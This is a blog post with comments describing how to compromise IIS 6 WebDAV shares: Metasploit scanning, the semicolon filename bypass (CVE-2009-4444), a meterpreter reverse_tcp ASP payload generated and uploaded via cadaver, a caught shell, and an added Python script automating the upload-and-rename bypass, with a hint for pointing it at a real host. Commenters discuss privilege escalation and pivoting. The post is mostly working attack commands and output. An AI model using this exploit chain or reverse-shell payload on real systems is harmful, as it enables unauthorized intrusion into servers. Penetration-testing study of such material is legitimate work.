Monday, May 3, 2010

More with Metasploit and WebDAV


intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial; it's not bad. Pay attention to the part about giving your IUSR_WHATEVER account write access, or set up a Windows account and use authentication instead.

Metasploit has a few auxiliary modules to test for WebDAV presence.

webdav_scanner:
msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_internal_ip:
msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_website_content:
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory. If someone has shared out the web root instead, it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or, if you have the path wrong, webdav_test will tell you DAV is disabled there:
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If you need to see what methods are allowed, you can use the http options auxiliary module. Note that the list below has no PUT in it even though the davaroo share turns out to be writable, so don't rule out uploads on the strength of the OPTIONS response alone.
msf auxiliary(options) > run

[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
To quickly see if you can upload things, give DAVtest a try, or Ryan Linn's webdav_test module (a port of DAVtest to Metasploit):
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content, or anything otherwise useful, on the box. In this case I can upload .php, .cgi, .jsp and .aspx, but nothing on the server will execute any of that content; "executable" in the output above only means the uploaded test file came back as expected when requested, which is why just html and txt qualify.

If you try to PUT an .asp you'll get a 403 Forbidden, and if you try to COPY/MOVE a .txt to .asp you'll get the same. :-(

Thankfully there is a "feature" of 2k3 (the IIS 6 semicolon filename-parsing bug, CVE-2009-4444) that allows you to upload evil.asp;.txt and bypass the filter: the upload check sees a .txt extension, but IIS picks the handler from the part of the name before the ';' and runs the file as ASP.

So we generate our evil.asp file using msfpayload and msfencode; you could also use any other ASP shell:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Upload it with cadaver under a .txt name, then COPY it to the semicolon name (cadaver URL-encodes the ';' as %3b in the Destination header, which is what you see in the confirmation line):
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
Now start a multi/handler for windows/meterpreter/reverse_tcp on 192.168.6.94:443 and browse to http://192.168.242.134/davaroo/tcp443meterp.asp;.txt to get your shell:
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that the shell came back with a less than desirable privilege (NT AUTHORITY\NETWORK SERVICE, the default IIS 6 application pool identity). Note that getuid failed inside the original host process and only worked after migrating to notepad.exe. You'll have to work the local privilege escalation angle from there, but at least you have a shell.
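The probe and the semicolon rename above, as an added example that is not part of the original post or of Metasploit: a Python script that does what webdav_test does (MKCOL a scratch collection, PUT one probe per extension, GET each back, report uploadable vs executable, clean up), then the PUT-as-.txt, COPY-to-.asp;.txt sequence from the cadaver session. Because it has to run offline, the target is FakeIIS6, a constructed stand-in that models only the two behaviours the post relies on (the write filter looks at the text after the last dot, the request handler at the text before the first ';'); it is not real IIS, and its toy ASP "engine" understands nothing but Response.Write. The marker string, the /davaroo paths and all helper names are my own.

```python
# Added example (not the post's code): the checks above, run offline against
# FakeIIS6, a constructed stand-in for an IIS 6 share. Any callable with the
# signature send(method, path, headers, body) -> (status, headers, body) fits.
import posixpath
import random
import re
from urllib.parse import quote, unquote, urlsplit

MARKER = "WebDavTestMarker"
# A type is "executable" only if GET returns exactly MARKER; html/txt pass trivially.
PROBE_BODIES = {
    "html": MARKER,
    "txt": MARKER,
    "asp": f'<% Response.Write("{MARKER}") %>',
    "aspx": f'<%@ Page Language="C#" %><% Response.Write("{MARKER}"); %>',
    "php": f'<?php echo "{MARKER}"; ?>',
}

class FakeIIS6:
    """Models only what the post shows: the write filter checks the text after the
    LAST dot (PUT path or COPY Destination), the handler the text before the FIRST ';'."""
    ALLOW = "OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK"

    def __init__(self):
        self.files = {}  # path -> bytes

    @staticmethod
    def filter_ext(path):
        return posixpath.splitext(path)[1].lstrip(".").lower()

    @staticmethod
    def handler_ext(path):
        return posixpath.splitext(posixpath.basename(path).split(";", 1)[0])[1].lstrip(".").lower()

    def __call__(self, method, path, headers, body):
        if method == "OPTIONS":
            return 200, {"Allow": self.ALLOW}, b""  # no PUT listed, exactly as in the post
        if method == "MKCOL":
            return 201, {}, b""
        if method in ("PUT", "COPY"):
            dest = path if method == "PUT" else unquote(urlsplit(headers["Destination"]).path)
            if self.filter_ext(dest) == "asp":
                return 403, {}, b""
            data = body if method == "PUT" else self.files.get(path)
            if data is None:
                return 404, {}, b""
            self.files[dest] = data
            return 201, {}, b""
        if method == "GET":
            data = self.files.get(path)
            if data is None:
                return 404, {}, b""
            if self.handler_ext(path) == "asp":  # the IIS 6 quirk: 'x.asp;.txt' runs as ASP
                m = re.search(r'Response\.Write\("([^"]*)"\)', data.decode("latin-1"))
                data = (m.group(1) if m else "").encode()  # toy engine, proves it was run
            return 200, {}, data
        if method == "DELETE":
            self.files = {k: v for k, v in self.files.items() if not k.startswith(path)}
            return 204, {}, b""
        return 405, {}, b""

def probe_share(send, base):
    """webdav_test logic: MKCOL a scratch dir, PUT a probe per extension, GET it back, clean up."""
    tag = "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=10))
    scratch = f"{base.rstrip('/')}/WebDavTest_{tag}"
    if send("MKCOL", scratch, {}, b"")[0] not in (200, 201):
        return [], []
    uploadable, executable = [], []
    for ext, probe in PROBE_BODIES.items():
        path = f"{scratch}/{tag}.{ext}"
        if send("PUT", path, {}, probe.encode())[0] not in (200, 201, 204):
            continue
        uploadable.append(ext)
        status, _, got = send("GET", path, {}, b"")
        if status == 200 and got.strip() == MARKER.encode():
            executable.append(ext)
    send("DELETE", scratch, {}, b"")
    return uploadable, executable

def semicolon_upload(send, base, name, asp_source):
    """PUT the ASP as .txt, then COPY it to name.asp;.txt. Destination must be
    URL-encoded, so ';' goes out as %3B (cadaver sent %3b in the log above)."""
    txt, dest = f"{base}/{name}.txt", f"{base}/{name}.asp;.txt"
    if send("PUT", txt, {}, asp_source)[0] not in (200, 201, 204):
        return None
    if send("COPY", txt, {"Destination": quote(dest)}, b"")[0] not in (201, 204):
        return None
    return dest

def demo(base="/davaroo"):
    iis = FakeIIS6()
    uploadable, executable = probe_share(iis, base)
    asp = PROBE_BODIES["asp"].encode()
    iis("PUT", f"{base}/evil.txt", {}, asp)
    return {
        "allow": [m.strip() for m in iis("OPTIONS", "/", {}, b"")[1]["Allow"].split(",")],
        "uploadable": uploadable, "executable": executable,
        "put_asp": iis("PUT", f"{base}/evil.asp", {}, asp)[0],
        "copy_to_asp": iis("COPY", f"{base}/evil.txt", {"Destination": f"{base}/evil.asp"}, b"")[0],
        "bypass": semicolon_upload(iis, base, "tcp443meterp", asp),
        "served": iis("GET", f"{base}/tcp443meterp.asp;.txt", {}, b"")[2].decode(),
    }
```

Calling demo() reproduces the post end to end: PUT of evil.asp and COPY to evil.asp both come back 403, the .txt copy is accepted, and a GET of tcp443meterp.asp;.txt returns the engine's output rather than the source. To use it against a lab host, pass a thin wrapper over http.client with the same send signature in place of FakeIIS6, and remember that on a real box the .txt copy serves your ASP source in clear until you delete it.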

more info here: http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

Resources:
cadaver: http://www.webdav.org/cadaver/
DAVtest: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit: http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb
CG

6 comments:

chao-mu said...

Recently I got into a WebDAV server in just this way, although I was able to COPY and didn't need the "feature" (IIS 5.0, Windows XP SP1). PUT the meterpreter payload, then COPY it into the /scripts/ directory, then grab it with a GET. Although, I used curl for interacting with the HTTP server and not metasploit. I love how lightweight curl is.

What is the 'local angle' you mention? That is the part I am struggling with at the moment. I am stuck as IWAM without the ability to elevate privileges. I have identified that a vulnerable version of SMB is running, but it is only accessible through the loopback interface. However, to make matters worse, ports I open up are not available to the outside world, so port forwarding is not an option. Do you have any suggestions on where to go from there?

chao-mu said...

Whoops, I mean IIS 5.1.

Also, I noticed that there was an entry in the routing table mapping its IP to 127.0.0.1. I pivoted on that and was able to exploit SMB and get SYSTEM.

Kristian Erik Hermansen said...

So, if the semi-colon trick doesn't work anymore, there is no other way to gain remote access? It appears Windows 2008+ / IIS fixed that trick. Any other workarounds? I attempted NULL bytes, CR/LF, #, ?, URI Double Encoding, all to no avail :(

CG said...

Kristian,

No idea, haven't had to test it on anything above 2k3 yet.

Anonymous said...

I read your blog and I found that, to generate the meterpreter ASP payload, you have used the wrong payload: instead of reverse_tcp you should have used reverse_http. Anyways, nice read :)

CG said...

You can use whatever payload you want; you just have to generate the ASP output for the payload.